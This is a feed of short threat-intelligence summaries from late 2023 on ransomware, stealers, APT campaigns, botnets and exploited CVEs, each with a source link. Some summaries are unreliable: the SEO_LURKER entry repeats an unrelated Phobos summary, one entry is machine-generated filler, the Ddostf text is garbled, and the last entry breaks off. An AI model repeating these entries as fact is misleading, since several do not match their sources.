Summary:: Cybereason issues Threat Alerts regarding a new ransomware group, INC Ransom, that has surfaced in August 2023. Operating primarily in the United States and Europe, the group employs a double and triple extortion strategy, leaking data on a dedicated blog and exercising pressure on victims to pay the ransom. INC Ransom's victims consist mainly of private sector businesses, with a notable incident involving a government organization and a charity association. The group's modus operandi involves using compromised credentials for lateral movement, deploying ransomware through WMIC and PSEXEC, and employing tools like MegaSync for data exfiltration.

Source: https://www.cybereason.com/blog/threat-alert-inc-ransomware

Intel Source:: Outpost24

Intel Name:: A_new_Anti_Sandbox_technique_LummaC2_4_0_stealer

Date of Scan:: 2023-11-21

Impact:: LOW

Summary:: Outpost24 threat researchers dived in deep into a new Anti-Sandbox technique LummaC2 v4.0 stealer is using to avoid detonation if no human mouse activity is detected.

Source: https://outpost24.com/blog/lummac2-anti-sandbox-technique-trigonometry-human-detection/

Intel Source:: CISA

Intel Name:: LockBit_3_0_ransomware_exploiting_CVE_2023_4966

Date of Scan:: 2023-11-21

Impact:: MEDIUM

Summary:: CISA, FBI, MS-ISAC, and Australian Signals Directorate’s Australian Cyber Security Center (ASD’s ACSC) are releasing this joint Cybersecurity Advisory (CSA) to disseminate IOCs, TTPs, and detection methods associated with LockBit 3.0 ransomware exploiting CVE-2023-4966, labeled Citrix Bleed, affecting Citrix NetScaler web application delivery control (ADC) and NetScaler Gateway appliances.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a

Intel Source:: ISC. SANS

Intel Name:: Quasar_RAT_Delivery

Date of Scan:: 2023-11-21

Impact:: LOW

Summary:: Researchers from SANS observed old payload Quasar RAT that was delivered through updated SharpLoader. Its purpose is to load and uncompress a C# payload from a remote web server or a local file to execute it.

Source: https://isc.sans.edu/diary/rss/30414

Intel Source:: Securonix Threat Labs

Intel Name:: New_SEO_LURKER_Attack_Campaign

Date of Scan:: 2023-11-21

Impact:: MEDIUM

Summary:: Cisco Talos recently identified the most creative Phobos variants, common affiliate tactics, techniques and procedures (TTPs), and characteristics of the Phobos affiliate structure, based on observed Phobos activity and analysis of over 1,000 Phobos samples back from some time ago. Talos analysts convinced that Eking, Eight, Elbie, Devos and Faust are the most common Phobos variants, as they appeared most frequently across the samples Talos analyzed.

Source: https://www.securonix.com/blog/seolurker-attack-campaign-uses-seo-poisoning-fake-google-ads-to-install-malware/

Intel Source:: Ciberdefensa

Intel Name:: Malicious_LNK_File_Campaign_Targeting_Financial_and_Blockchain_Corporations

Date of Scan:: 2023-11-21

Impact:: MEDIUM

Summary:: A recent security alert from AhnLab Security Emergency Response Center (ASEC) reveals a sophisticated campaign distributing malicious LNK files to personnel within financial and blockchain corporations. The malicious files, disguised as legitimate documents, deceive users during the opening process. The LNK files execute obfuscated PowerShell commands, leading to the creation of additional files and potential compromise of systems.

Source: https://ciberdefensa.cat/archivos/30438

Intel Source:: Kilguard, ASEC

Intel Name:: Ddostf_Botnet_Resurfaces_in_DDoS_Attacks

Date of Scan:: 2023-11-21

Impact:: MEDIUM

Summary:: ASEC researchers have shared their concerns about a new campaign focusing on MySQL servers and Docker hosts with DDoS malware. Researchers declare that this malware is meant to launch DDoS attacks and that the risk actor is working a DDoS-for-retain the services of support.

Source: https://kilguard.net/ddostf-botnet-resurfaces-in-ddos-attacks-against-mysql-and-docker-hosts/

Intel Source:: Talos

Intel Name:: The_most_prolific_Phobos_variants_lately

Date of Scan:: 2023-11-20

Impact:: LOW

Summary:: Cisco Talos recently identified the most creative Phobos variants, common affiliate tactics, techniques and procedures (TTPs), and characteristics of the Phobos affiliate structure, based on observed Phobos activity and analysis of over 1,000 Phobos samples back from some time ago. Talos analysts convinced that Eking, Eight, Elbie, Devos and Faust are the most common Phobos variants, as they appeared most frequently across the samples Talos analyzed.

Source: https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/

Intel Source:: ASEC

Intel Name:: An_Apache_Web_Server_Cryptojacking_Attack_Using_Cobalt_Strike

Date of Scan:: 2023-11-20

Impact:: LOW

Summary:: Researchers from ASEC have kept an eye out for threats directed towards weakly maintained or unpatched web servers. Web servers are key targets for attack by threat actors since they are publicly accessible to provide web services to all users.

Source: https://asec.ahnlab.com/en/59110/

Intel Source:: sentinelone

Intel Name:: AI_Crimeware_Ransomware_Surge_Israel_Hamas_Cyber_Warfare

Date of Scan:: 2023-11-20

Impact:: MEDIUM

Summary:: Researchers at SentinelLabs have discovered delves into current trends shaping the cyber threat landscape. It scrutinizes the evolving landscape of AI-driven crimeware, spotlighting tools like FraudGPT and WolfGPT. Additionally, it details notable ransomware incidents targeting institutions such as ICBC, the Toronto Public Library, and Japan Aviation Electronics.

Source: https://www.sentinelone.com/blog/nov-2023-cybercrime-update-llms-ransomware-and-destructive-wipers-proliferate-in-recent-attacks/

Intel Source:: Sentinelone

Intel Name:: A_Deep_Dive_into_a_Decade_of_Hack_for_Hire_Operations

Date of Scan:: 2023-11-20

Impact:: MEDIUM

Summary:: SentinelLabs' latest report exposes the extensive activities of the Appin Security Group, a prominent player in the hack-for-hire services domain. The comprehensive analysis delves into a myriad of global cyber intrusions involving espionage, surveillance, and disruptive actions across countries such as Norway, Pakistan, China, and India.

Source: https://www.sentinelone.com/labs/elephant-hunting-inside-an-indian-hack-for-hire-group/

Intel Source:: Esentire

Intel Name:: SolarMarker_Evolution_and_Tactics_Unveiled_in_2023

Date of Scan:: 2023-11-20

Impact:: LOW

Summary:: The eSentire Threat Response Unit (TRU) has closely monitored the SolarMarker malware, also known as Jupyter, since 2021. This .NET-based malware with a backdoor capability primarily targets vulnerable WordPress websites to distribute its payload. Over the years, SolarMarker has evolved its decryption routines, transitioning from XOR encryption to AES while maintaining its core functionality

Source: https://www.esentire.com/blog/solarmarker-to-jupyter-and-back

Intel Source:: Security Boulevard

Intel Name:: Underscore_a_persistent_risk_in_open_source_npm_software

Date of Scan:: 2023-11-19

Impact:: MEDIUM

Summary:: Recent discovery of open source software packages on npm platform contain scripts broadcasting peace messages related to ongoing conflicts. These packages are examples of protestware, which can be benign or malicious. Risks of protestware discussed, emphasizing need for development organizations to investigate code they rely on.

Source: https://securityboulevard.com/2023/11/protestware-taps-npm-to-call-out-wars-in-ukraine-gaza/

Intel Source:: Checkmarx

Intel Name:: Python_Developers_Hidden_in_Plain_Sight_For_Nearly_Six_Months

Date of Scan:: 2023-11-18

Impact:: LOW

Summary:: Researchers at Checkmarx have discovered that a threat actor has been inserting malicious Python packages into the open-source repository for almost six months. Numerous harmful packages are disguising themselves under names that closely resemble well-known, authentic Python packages. As a result, they were downloaded thousands of times.

Source: https://checkmarx.com/blog/attacker-hidden-in-plain-sight-for-nearly-six-months-targeting-python-developers/

Intel Source:: CISA

Intel Name:: Scattered_Spider

Date of Scan:: 2023-11-18

Impact:: HIGH

Summary:: The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to recent activity by Scattered Spider threat actors against the commercial facilities sectors and subsectors. This advisory provides tactics, techniques, and procedures (TTPs) obtained through FBI investigations as recently as November 2023. Scattered Spider is a cybercriminal group that targets large companies and their contracted information technology (IT) help desks. Scattered Spider threat actors, per trusted third parties, have typically engaged in data theft for extortion and have also been known to utilize BlackCat/ALPHV ransomware alongside their usual TTPs.

Source: https://www.cisa.gov/sites/default/files/2023-11/aa23-320a_scattered_spider.pdf

Intel Source:: Antiy

Intel Name:: Analysis_of_a_LockBit_Ransomware_Sample

Date of Scan:: 2023-11-18

Impact:: MEDIUM

Summary:: Ransomware was recently used to attack a financial institution. Information from a number of sources suggests that this incident is closely associated with the group behind the LockBit ransomware attack. Antiy CERT describes LockBit as having a "close association" since it is an attack group that uses the "ransomware as a service" (RaaS) paradigm.

Source: https://www.antiy.cn/research/notice&report/research_report/LockBit.html

Intel Source:: Google Blog

Intel Name:: Zimbra_0_day_attacks_on_international_government_organizations

Date of Scan:: 2023-11-18

Impact:: MEDIUM

Summary:: Google's Threat Analysis Group (TAG) discovered an in-the-wild 0-day exploit targeting Zimbra Collaboration, an email server. Four different groups were observed exploiting the same bug to steal data, credentials, and tokens. TAG urges users to keep software up-to-date and apply security updates to protect against these types of exploits. They also add identified websites and domains to Safe Browsing.

Source: https://blog.google/threat-analysis-group/zimbra-0-day-used-to-target-international-government-organizations/

Intel Source:: Intezer

Intel Name:: Dismantling_the_IPStorm_Botnet_Infrastructure

Date of Scan:: 2023-11-18

Impact:: LOW

Summary:: The FBI disclosed the breakdown of a botnet proxy network by US law enforcement and the guilty plea of the person in charge of the botnet infrastructure connected to the IPStorm virus. In the continuous fight against cyberthreats, this accomplishment represents a critical turning point. As the new IPStorm malware versions and capabilities spread to infect Linux, Mac, and Android devices worldwide, the research team at Intezer shared their discoveries and analysis with the FBI to aid in their case.

Source: https://intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/

Intel Source:: Antiy CERT

Intel Name:: A_new_round_of_attacks_by_the_Youshe_group

Date of Scan:: 2023-11-18

Impact:: LOW

Summary:: Recently, Antiy CERT has detected a new round of phishing attacks by the "Youshe" black product gang ("Silver Fox") targeting financial personnel and small store merchant customer service. In this round of attacks, the gang disguised the malicious program as a document file and packaged it into a compressed package file. It spread through the model of "black production gang-agent-recruiting members-looking for targets", inducing users to execute and obtain the victim host. remote control rights.

Source: https://www.antiy.cn/research/notice&report/research_report/SwimSnake_Analysis.html

Intel Source:: CERT-UA

Intel Name:: Remcos_RAT_attacks_disguised_as_SBU_request

Date of Scan:: 2023-11-18

Impact:: MEDIUM

Summary:: The government computer emergency response team of Ukraine CERT-UA discovered the fact of mass distribution of e-mails, allegedly on behalf of the Security Service of Ukraine, with an attachment in the form of a RAR file "Electronic request of the SBU of Ukraine.rar".

Source: https://cert.gov.ua/article/6276351

Intel Source:: ISC. SANS

Intel Name:: MSIX_Package

Date of Scan:: 2023-11-17

Impact:: LOW

Summary:: This article discusses the MSIX package file format and how GHOSTPULSE malware was identified to bypass security controls. It explains how a hunting rule was created to detect ZIP archives containing two files, and provides an example of a low VT score MSIX file. It also explains the content of the wrapper and config files, and how the script "worldhack.ps1" is automatically executed during package installation, with the payload identified as Redline.

Source: https://isc.sans.edu/diary/rss/30404

Intel Source:: Sekto CERT

Intel Name:: Cyberattack_on_Danish_Critical_Infrastructure_Linked_to_Russian_Hackers

Date of Scan:: 2023-11-17

Impact:: MEDIUM

Summary:: Possible connections exist between Russian threat actors and what has been called the "largest cyber attack against Danish critical infrastructure," which took place in May 2023 and targeted 22 businesses involved in the nation's energy management.

Source: https://sektorcert.dk/wp-content/uploads/2023/11/SektorCERT-The-attack-against-Danish-critical-infrastructure-TLP-CLEAR.pdf

Intel Source:: Fortinet

Intel Name:: The_NoEscape_ransomware_roundup

Date of Scan:: 2023-11-17

Impact:: MEDIUM

Summary:: NoEscape ransomware group emerged in May 2023 and runs a Ransomware-as-a-Service program targeting multiple industry verticals, primarily in the US. It encrypts files and leaves a ransom note, and victims can contact the threat actor through a TOR site. Fortinet customers are protected, and best practices are provided to protect against ransomware.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-noescape

Intel Source:: ASEC

Intel Name:: Distribution_of_malware_mimicking_a_LNK

Date of Scan:: 2023-11-17

Impact:: LOW

Summary:: Malicious shortcut files are being distributed by a threat actor targeting individuals in the field of Korean reunification and national security. The malware breaches user information and downloads additional malware, including TutRAT, which allows malicious behaviors such as keylogging and stealing browser account information. AhnLab recommends subscribing to their threat intelligence platform to check related IOCs.

Source: https://asec.ahnlab.com/en/59042/

Intel Source:: Securityjoes

Intel Name:: An_Extensive_Data_Wiping_Operation_Aimed_Against_Israel

Date of Scan:: 2023-11-17

Impact:: MEDIUM

Summary:: Researchers at SecurityJoes have investigated a sophisticated security compromise that resulted in substantial data loss affecting multiple businesses. Defense contractors and an Israeli data hosting provider were among the targets.

Source: https://www.securityjoes.com/post/mission-data-destruction-a-large-scale-data-wiping-campaign-targeting-israel

Intel Source:: CISA

Intel Name:: Rhysida_Ransomware

Date of Scan:: 2023-11-17

Impact:: HIGH

Summary:: The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known Rhysida ransomware IOCs and TTPs identified through investigations as recently as September 2023. Rhysida—an emerging ransomware variant—has predominately been deployed against the education, healthcare, manufacturing, information technology, and government sectors since May 2023. The information in this CSA is derived from related incident response investigations and malware analysis of samples discovered on victim networks.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-319a

Intel Source:: Cyber Geeks

Intel Name:: Dark_Pink_APT_Deployments

Date of Scan:: 2023-11-16

Impact:: MEDIUM

Summary:: The Asia-Pacific (APAC) area is currently experiencing a surge in advanced persistent threat (APT) attacks, which have been linked to a recently discovered group called Dark Pink (also known as the Saaiwc Group). Even though there is evidence that Dark Pink started operating as early as mid-2021, the group's activity really picked up in the later half of 2022.

Source: https://cyberint.com/blog/research/dark-pink-apt-attacks/

Intel Source:: Malwarebytes

Intel Name:: The_skimming_campaign_during_holidays

Date of Scan:: 2023-11-16

Impact:: MEDIUM

Summary:: The article discusses the rise of credit card skimming during the holiday shopping season. It explains malicious code is often embedded in merchant websites, making it difficult to detect when credit card information is stolen. It also mentions the Kritec skimming campaign, active since March 2023, and provides advice on how to shop safely online and a list of indicators of compromise associated with the Kritec campaign.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/11/credit-card-skimming-on-the-rise-for-the-holiday-shopping-season

Intel Source:: Cyble

Intel Name:: Active_Vulnerability_Exploitation_for_Citrix_and_Big_IP

Date of Scan:: 2023-11-16

Impact:: LOW

Summary:: Researchers at Cyble have discovered that recently discovered vulnerabilities—which were first mentioned in the most recent Cybersecurity and Infrastructure Security Agency (CISA) advisory—are still being exploited. By releasing security alerts for the Big IP vulnerabilities (CVE-2023-46747, CVE-2023-46748) on October 31 and the actively exploited Citrix vulnerability (CVE-2023-4966) on October 10, CISA demonstrated proactive actions.

Source: https://cyble.com/blog/active-exploitation-of-big-ip-and-citrix-vulnerabilities-observed-by-cyble-global-sensor-intelligence-network/

Intel Source:: Cyber Geeks

Intel Name:: Personal_Attacks_on_Romanian_Gas_Companies

Date of Scan:: 2023-11-16

Impact:: LOW

Summary:: Researchers at Cyber Geeks have examined a scheme that exposes newly registered domains posing as well-known Romanian gas companies.

Source: https://cybergeeks.tech/attackers-impersonate-romanian-gas-companies-osint-investigation/

Intel Source:: Infoblox

Intel Name:: The_DGAs_New_Face

Date of Scan:: 2023-11-16

Impact:: LOW

Summary:: Infoblox has been offering DNS detection and response to domain generation algorithms (DGAs) since 2015. DGAs are a common tool used by DNS threat actors to disseminate illicit content, adware, malware, and phishing campaigns.

Source: https://blogs.infoblox.com/cyber-threat-intelligence/rdgas-the-new-face-of-dgas/

Intel Source:: Quointelligence

Intel Name:: The_Russian_speaking_voter_information_operation_in_Spain

Date of Scan:: 2023-11-16

Impact:: MEDIUM

Summary:: An account of a recent effort that targeted Spain's Russian-speaking populace was given by Quointelligence researchers.

Source: https://quointelligence.eu/2023/11/spanish-election-information-operation-targeting-russian-speakers/?utm_campaign=Weekly%20Intelligence%20Summary&utm_source=hs_email&utm_medium=email&_hsenc=p2ANqtz-_7IVfdWrapH88ypcmqt1GlAB6-Aw2QyyVIghA-QflovrbBHnc-z-J3_JrlkimvWQiWsYTY

Intel Source:: GBHackers

Intel Name:: APT_Infrastructure_in_China_Imitates_Cloud_Backup_Services

Date of Scan:: 2023-11-15

Impact:: MEDIUM

Summary:: GBHackers researchers have found that Chinese APT actors have targeted and penetrated government agencies in Cambodia. The infrastructure is being used by the threat actors to pose as a cloud backup service. The architecture also shows a number of persistent and malevolent connections.

Source: https://gbhackers.com/chinese-apt-mimics-cloud-backup/

Intel Source:: Malware Analysis

Intel Name:: Ddostf_DDoS_Bot_Malware_Attacking_MySQL_Servers

Date of Scan:: 2023-11-15

Impact:: MEDIUM

Summary:: Ddostf DDoS bot is a malware targeting vulnerable MySQL servers. This bot, first identified in 2016 and known to operate in both Windows and Linux environments, conducts Distributed Denial of Service attacks. Attackers exploit MySQL servers using the 3306/TCP port, often through brute-force or dictionary attacks, and may also exploit system vulnerabilities. The Ddostf bot employs User-defined Function (UDF) DLLs to execute commands on the infected system, including downloading and executing additional malware. Ddostf copies itself under a random name in the system directory, registers as a service, and connects to a command-and-control server, from where it sends system information

Source: https://malware.news/t/ddostf-ddos-bot-malware-attacking-mysql-servers/75611

Intel Source:: Malware news

Intel Name:: The_exploitation_of_disguised_media_websites

Date of Scan:: 2023-11-15

Impact:: MEDIUM

Summary:: This article provides an overview of the lack of content in the section. It highlights the need for more content to be added in order to provide a comprehensive understanding of the topic.

Source: https://malware.news/t/national-cyber-security-center-has-detected-influence-operations-exploiting-china-s-disguised/75617

Intel Source:: nccgroup

Intel Name:: Medusa_RaaS

Date of Scan:: 2023-11-15

Impact:: MEDIUM

Summary:: Researchers have analyzed the Medusa ransomware, a Ransomware-as-a-Service active since 2021, known for its double-extortion method. In a recent incident, initial access was gained through an exploited web server, leading to the deployment of webshells for continuous access. The attackers executed a range of activities, including using PowerShell to disable antivirus services, dumping password hashes, and exfiltrating data. The ransomware, which encrypts and threatens to release data unless a ransom is paid, was deployed over a 271-day period, utilizing various techniques for persistence and defense evasion. These included creating new user accounts, uploading web shells, and disabling Windows Defender. Lateral movement within the network was facilitated through Remote Desktop Protocol, and command-and-control was maintained via a reverse tunnel. The attack culminated in the deployment of the Medusa ransomware, resulting in encrypted files with the .MEDUSA extension and significant system recovery impediments due to the deletion of VMs and backups.

Source: https://research.nccgroup.com/2023/11/13/dont-throw-a-hissy-fit-defend-against-medusa/

Intel Source:: ASEC

Intel Name:: A_malware_strain_distribution_through_breached_legitimate_website

Date of Scan:: 2023-11-15

Impact:: LOW

Summary:: AhnLab EDR detected a malware strain distributed through breached legitimate websites using LNK files. It records files infiltration and exfiltration and allows users to view the infiltration path and file information. The malicious features of the script include executing another script, collecting system information, registering itself to the autorun registry, and sending data. AhnLab EDR protects the endpoint environment by providing behavioral detection, advanced analysis, holistic visibility, and proactive threat hunting.

Source: https://asec.ahnlab.com/en/58919/

Intel Source:: PaloAlto

Intel Name:: The_dangers_of_viewing_Clickbait_sites

Date of Scan:: 2023-11-15

Impact:: MEDIUM

Summary:: This article discusses the vulnerability CVE-2023-3169, which affects WordPress sites using the Newspaper and Newsmag themes with the Composer plugin. It reveals a massive campaign using the Balada Injector to exploit the vulnerability, and provides an example of the malicious script injected into webpages. It also outlines the trend of clickbait and ad sites being compromised at a nearly three to one ratio compared to other categories. Finally, it provides advice for readers to be aware of the risk and adjust their browsing habits accordingly.

Source: https://unit42.paloaltonetworks.com/dangers-of-clickbait-sites/

Intel Source:: Resecurity

Intel Name:: The_increase_of_ransomware_attacks_on_the_energy_sector_and_on_nuclear_energy_firms

Date of Scan:: 2023-11-15

Impact:: HIGH

Summary:: Resecurity has identified a potential breach of Doosan's Active Directory and other nuclear research organizations, as well as a BlackCat Ransomware attack on the European energy sector in February 2022. Additionally, threat actors have been targeting nuclear-energy firms and related entities, such as Brazil's National Nuclear Energy Commission, Israel's Neve Ne'eman nuclear reactor, and Indonesia's National Nuclear Energy Agency (Batan). In April 2022, Oil India Limited (OIL) was hit by a ransomware attack, and in March 2022, State Electric Company Limited (STELCO) in Maldives experienced a ransomware attack by the Hive group.

Source: https://www.resecurity.com/blog/article/ransomware-attacks-against-the-energy-sector-on-the-rise-nuclear-and-oil-gas-are-major-targets-2024

Intel Source:: Proofpoint

Intel Name:: TA402_with_IronWind_Infection_target_Middle_East_Based_Government

Date of Scan:: 2023-11-15

Impact:: HIGH

Summary:: From July to October 2023, researchers observed the TA402 group executing targeted phishing campaigns against Middle East and North Africa government entities using a complex infection chain called IronWind. The group varied its attack methods, shifting from Dropbox links to XLL and RAR file attachments to deliver the multifunctional malware. TA402's campaigns involved phishing emails with lures related to economic themes or regional conflicts, utilizing compromised email accounts to deliver malware that communicated with a command-and-control domain. The IronWind downloader initiated a multi-stage infection process, involving a .NET executable and shellcode, aimed at espionage and intelligence collection. The group consistently employed geofencing techniques to hinder detection and maintained a focus on specific targets, despite ongoing regional conflicts. This activity demonstrates TA402's persistent and evolving approach to cyber espionage.

Source: https://www.proofpoint.com/us/blog/threat-insight/ta402-uses-complex-ironwind-infection-chains-target-middle-east-based-government

Intel Source:: Esentire

Intel Name:: Nitrogen_Campaign_2

Date of Scan:: 2023-11-15

Impact:: MEDIUM

Summary:: Researchers observed multiple incidents from a new Nitrogen campaign leading to ALPHV/BlackCat Ransomware infections. This campaign involved drive-by downloads where users inadvertently installed malicious software from compromised websites or through deceptive search advertisements. The initial infection was traced to an unmanaged device with access to the customer’s network, involving the download of Nitrogen payloads. The ISO file related to the infection contained several files, including executables and DLLs that decrypted additional ZIP archives containing malicious payloads. The campaign utilized encrypted commands in scheduled tasks and employed advanced techniques like transacted hollowing for process injection. Researchers noted enhanced capabilities in the malware, including AMSI bypass, ETW and WLDP patching, and antivirus evasion. The post-exploitation activities included lateral movement, data exfiltration, and the deployment of ALPHV ransomware, which encrypted files and exfiltrated data, significantly impacting the affected organizations.

Source: https://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware

Intel Source:: SentinelOne

Intel Name:: C3RB3R_Ransomware_Ongoing_Exploitation_of_CVE_2023_22518_Targets_Unpatched_Confluence_Servers

Date of Scan:: 2023-11-15

Impact:: MEDIUM

Summary:: Researchers have observed an increase in the exploitation of CVE-2023-22518, a vulnerability in Atlassian’s Confluence Data Center and Server, which allows unauthorized creation of backdoor administrator accounts. This vulnerability has been leveraged in multiple campaigns to deploy new Cerber ransomware variants, targeting both Windows and Linux hosts. The attack begins with a specially crafted HTTP-POST command to the exposed Confluence instance, leading to administrative control. Attackers then execute PowerShell scripts to download and execute the ransomware payloads. These payloads, observed on remote servers, include Linux and Windows versions of Cerber, which encrypt files and append a ".L0CK3D" extension, while also attempting to remove Volume Shadow Copies. The ransomware leaves a note with a unique TOR-based portal for victims to pay the ransom.

Source: https://www.sentinelone.com/blog/c3rb3r-ransomware-ongoing-exploitation-of-cve-2023-22518-targets-unpatched-confluence-servers/

Intel Source:: ASEC

Intel Name:: Phishing_PDF_Files_Downloading_Malicious_Packages

Date of Scan:: 2023-11-14

Impact:: LOW

Summary:: PDFs, disguised as game downloads or cracked software, lead users to a website where they download an encrypted file. Upon decryption and execution, this file, "File.exe," modifies registry values to disable Windows Defender and steals IP and location information using browser login data. It then downloads various types of malware, including ransomware, PUPs, Infostealers, and droppers. The malware creates multiple subfiles and folders, significantly compromising the infected system. This campaign demonstrates the sophisticated methods used to distribute and execute multiple malware types, highlighting the need for caution when handling files from untrusted sources

Source: https://asec.ahnlab.com/en/58660/

Intel Source:: NSFocus

Intel Name:: THE_NEW_APT_GROUP_DARKCASINO_AND_THE_GLOBAL_SURGE_IN_WINRAR_0_DAY_EXPLOITS

Date of Scan:: 2023-11-14

Impact:: MEDIUM

Summary:: DarkCasino is economically motivated and targets industries such as cryptocurrency trading, online casinos, and network banks. Their primary attack vectors include watering hole phishing and spear phishing. The CVE-2023-38831 vulnerability allows for arbitrary execution in WinRAR software, which DarkCasino exploited starting April 2023. This vulnerability became a significant tool for attackers, with widespread exploitation observed by various APT groups, including DarkPink in Southeast Asia and Konni in East Asia, targeting government agencies and improving attack processes and techniques

Source: https://nsfocusglobal.com/the-new-apt-group-darkcasino-and-the-global-surge-in-winrar-0-day-exploits/

Intel Source:: FarghlyMal

Intel Name:: Stealc_Stealer

Date of Scan:: 2023-11-14

Impact:: MEDIUM

Summary:: Stealc, a sophisticated information stealer, stands out for its non-resident nature and flexible data collection settings. Its development draws inspiration from other well-known stealers like Vidar, Raccoon, Mars, and Redline. Notably, Stealc can exfiltrate a vast array of data directly to a Command & Control server, bypassing traditional data storage methods. This capability includes stealing browser-based information like logins, credit card details, cookies, and history, along with wallet extensions, local crypto wallet files, various account tokens, and configuration files from applications like Discord, Telegram, Steam, qTox, and Pidgin. Stealc also can take screenshots of the victim's machine. The malware employs techniques like opaque predicates for obfuscation and base64 encoding with RC4 decryption for its configuration, highlighting its complexity and evasive capabilities

Source: https://farghlymal.github.io/Stealc-Stealer-Analysis/

Intel Source:: Huntress

Intel Name:: Bitter_Pill_Third_Party_Pharmaceutical_Vendor_Linked_to_Pharmacy_and_Health_Clinic_Cyberattack

Date of Scan:: 2023-11-14

Impact:: LOW

Summary:: Attackers exploited a locally hosted instance of ScreenConnect, a remote access tool used by Outcomes. The attack involved four instances of ScreenConnect across two distinct endpoints, with one instance used on both endpoints. Tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) were similar across these endpoints. The attackers ensured persistent access by installing additional remote access tools like ScreenConnect or AnyDesk. One endpoint, a Windows Server 2019 Standard system in the pharmaceutical field, showed repeated access from August 9, 2023, using ScreenConnect, highlighting the sustained nature of the attack

Source: https://www.huntress.com/blog/third-party-pharmaceutical-vendor-linked-to-pharmacy-and-health-clinic-cyberattack

Intel Source:: Cado Security

Intel Name:: OracleIV

Date of Scan:: 2023-11-14

Impact:: MEDIUM

Summary:: OracleIV is a Dockerized Distributed Denial of Service (DDoS) botnet. This malware targets publicly-exposed Docker Engine API instances, exploiting misconfigurations to deliver a malicious Docker container. The container, named "oracleiv_latest," contains Python malware compiled as an ELF executable, capable of performing various DoS attacks. Attackers initiate access through a HTTP POST request to Docker's API, pulling the malicious image from Dockerhub. The malware connects to a Command and Control server for instructions, using novel authentication methods

Source: https://www.cadosecurity.com/oracleiv-a-dockerised-ddos-botnet/

Intel Source:: ISC.SANS

Intel Name:: Ongoing_Exploitation_of_Critical_Atlassian_Authentication_Bypass_Vulnerability_CVE_2023_22518

Date of Scan:: 2023-11-14

Impact:: LOW

Summary:: This report outlines the active exploitation of a severe authentication bypass vulnerability (CVE-2023-22518) in Atlassian products. Despite initial reassurances from Atlassian, evidence reveals ongoing exploitation attempts, with attackers targeting specific URLs and utilizing a common header. The first incidents were detected on November 2nd, originating from diverse IP addresses, including Digital Ocean, Indian, and US-based sources. Notably, a parallel scan for the unrelated /rest/api/user URL suggests broader security concerns. Organizations are urged to take immediate action, applying patches and monitoring for suspicious activity to safeguard their Atlassian instances.

Source: https://isc.sans.edu/diary/Exploit+Activity+for+CVE202322518+Atlassian+Confluence+Data+Center+and+Server/30376/

Intel Source:: Palo Alto

Intel Name:: CVE_2023_36884_and_CVE_2023_36584

Date of Scan:: 2023-11-14

Impact:: MEDIUM

Summary:: CVE-2023-36584 has been used in a cyberattack campaign by a pro-Russian APT group, Storm-0978 (also known as the RomCom Group). This campaign, observed in July 2023, targeted groups supporting Ukraine's admission into NATO. The attack utilized a sophisticated exploit chain involving a remote code execution vulnerability in Microsoft Office (CVE-2023-36884) to deliver malware. The lure was a weaponized Microsoft Word document, disguised as talking points for the NATO Summit on Ukraine. The vulnerability allowed bypassing of Microsoft's Mark-of-the-Web security feature, a critical aspect in the attack's success.

Source: https://unit42.paloaltonetworks.com/new-cve-2023-36584-discovered-in-attack-chain-used-by-russian-apt/

Intel Source:: Kaspersky Content Hub

Intel Name:: Modern_Asian_APT_Groups

Date of Scan:: 2023-11-14

Impact:: MEDIUM

Summary:: This report provides comprehensive intelligence on Asian Advanced Persistent Threat (APT) groups, aiming to equip cybersecurity professionals with the knowledge to counteract these threats. It details incidents across the globe, the tactics, techniques, and procedures (TTPs) employed by these groups, and the pattern of attacks that span various countries and industries. The report is structured to aid a wide range of cybersecurity roles, including SOC analysts and C-Level executives, with technical details, mitigation strategies, and statistics on attack victims. It's intended as a valuable resource for detecting and defending against the sophisticated tools and techniques of Asian APT actors.

Source: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/11/09055246/Modern-Asian-APT-groups-TTPs_report_eng.pdf

Intel Source:: Kaspersky

Intel Name:: Ducktail_malware_spreading_through_fake_clothing_job_ads

Date of Scan:: 2023-11-14

Impact:: LOW

Summary:: The Ducktail malware, active since 2021 and targeting Facebook business accounts, has been the focus of a recent campaign between March and October 2023, specifically targeting marketing professionals. This new version, written in Delphi, spreads via emails containing archives with images of new products and a malicious executable disguised as a PDF. The malware installs a browser extension that steals Facebook business and ad accounts. It manipulates browser shortcuts for Chromium-based browsers and uses AES encryption for some of its strings. The extension, disguised as Google Docs Offline, targets Facebook-related URLs to steal cookies and account details, potentially bypassing two-factor authentication using Facebook API requests and the 2fa.live service.

Source: https://securelist.com/ducktail-fashion-week/111017/

Intel Source:: TrendMicro

Intel Name:: Cerber_Ransomware_Exploits_Atlassian_Confluence_Vulnerability_CVE_23_2251

Date of Scan:: 2023-11-14

Impact:: LOW

Summary:: On October 31, 2023, Atlassian announced CVE-2023-22518, an improper authorization vulnerability in Confluence Data Center and Server, allowing unauthorized creation of admin accounts. The vulnerability's proof-of-concept was publicly leaked soon after. Researchers noted that Cerber ransomware is exploiting this vulnerability, reminiscent of Cerber's 2021 attacks on Atlassian's GitLab servers. The attack involves using a PowerShell command to download and execute a remote payload, connecting to a command-and-control server, and decrypting a text file to reveal the Cerber ransomware payload. This payload encrypts files and appends the ".L0CK3D" extension, also dropping a ransom note in all directories. The new Cerber variant has slight differences from older ones, indicating an evolution of the ransomware's techniques.

Source: https://www.trendmicro.com/en_us/research/23/k/cerber-ransomware-exploits-cve-2023-22518.html

Intel Source:: Cado Security

Intel Name:: OracleIV_A_Dockerised_DDoS_Botnet

Date of Scan:: 2023-11-14

Impact:: MEDIUM

